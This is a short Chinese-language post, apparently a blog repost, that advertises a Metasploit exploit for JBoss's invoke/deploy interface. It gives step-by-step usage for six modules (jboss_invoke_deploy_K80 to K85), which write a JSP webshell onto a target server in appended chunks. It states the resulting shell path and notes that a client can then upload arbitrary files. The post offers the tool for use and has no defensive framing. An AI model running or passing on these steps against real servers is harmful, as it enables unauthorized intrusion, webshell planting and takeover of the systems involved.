[EXP]K8 jboss invoke deploy getshell exploit

MSF jboss invoke deploy EXPLOIT moudlegit

Date:2013.11.28
Author:K8gegegithub

改这个EXP中 过程有点不进人意 没能在一个payload里直接输出小马
无奈只能分红了6步来执行,长度有限制 只能一次写入一段内容。
以追加方式写入 最后才构造出 JSP 小马...jsp

用法
BT5  MSF 下 JBOSS EXP存放路径 把这几个脚本丢到这里来
/opt/metasploit/msf3/modules/exploit/multi/http/

msfconsole
use exploit/multi/http/jboss_invoke_deploy_K80

use exploit/multi/http/jboss_invoke_deploy_K81
use exploit/multi/http/jboss_invoke_deploy_K82
use exploit/multi/http/jboss_invoke_deploy_K83
use exploit/multi/http/jboss_invoke_deploy_K84
use exploit/multi/http/jboss_invoke_deploy_K85

set RHOST 172.16.126.134
exploit

成功后小马路径为  www.xxoo.com/jboosjdk/inc.jsp  
使用K8新型小马客户端链接 可上传任意格式文件get

 

https://github.com/k8gege/JbossExploitit

https://github.com/k8gege/K8toolsconsole

相关文章
相关标签/搜索